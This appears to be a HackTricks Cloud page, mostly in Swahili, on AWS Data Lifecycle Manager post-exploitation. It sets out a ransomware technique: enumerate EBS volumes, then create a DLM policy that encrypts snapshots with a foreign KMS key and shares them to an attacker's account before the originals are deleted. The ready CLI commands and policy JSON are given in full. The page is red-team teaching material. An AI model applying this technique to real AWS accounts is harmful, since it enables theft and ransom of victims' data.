HackTricks CloudAWS - DLM Post Exploitation
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Data Lifecycle Manger (DLM)
EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
Shambulio la ransomware linaweza kutekelezwa kwa ku-encrypt idadi kubwa ya EBS volumes iwezekanavyo kisha kufuta EC2 instances, EBS volumes, na snapshots zilizopo. Ili ku-automate shughuli hii ya uharibu, mtu anaweza kutumia Amazon DLM, ku-encrypt snapshots kwa KMS key kutoka kwa AWS account nyingine na kuhamisha snapshots zilizokenywa (encrypted) kwenda account tofauti. Vinginevyo, wanaweza kuhamisha snapshots bila encryption kwenda account wanayosimamia kisha ku-encrypt pale. Ingawa si rahisi ku-encrypt EBS volumes au snapshots zilizopo moja kwa moja, inawezekana kufanya hivyo kwa kuunda volume au snapshot mpya.
Kwanza, mtu atatumia amri kukusanya taarifa juu ya volumes, kama instance ID, volume ID, encryption status, attachment status, na volume type.
aws ec2 describe-volumes
Pili, mtu ataunda lifecycle policy. Amri hii inatumia DLM API kusanidi lifecycle policy ambayo ina-take snapshots za kila siku za volumes zilizobainishwa kwa wakati uliowekwa. Pia inaweka tags maalum kwenye snapshots na kunakili tags kutoka kwa volumes kwenda snapshots. Faili policyDetails.json inaelezea maelezo ya lifecycle policy, kama target tags, schedule, ARN ya KMS key ya hiari kwa encryption, na account lengwa kwa ajili ya snapshot sharing, ambayo itarekodiwa kwenye CloudTrail logs za mwathiri.
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
Kiolezo cha dokumenti ya sera kinaweza kuonekana hapa:
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.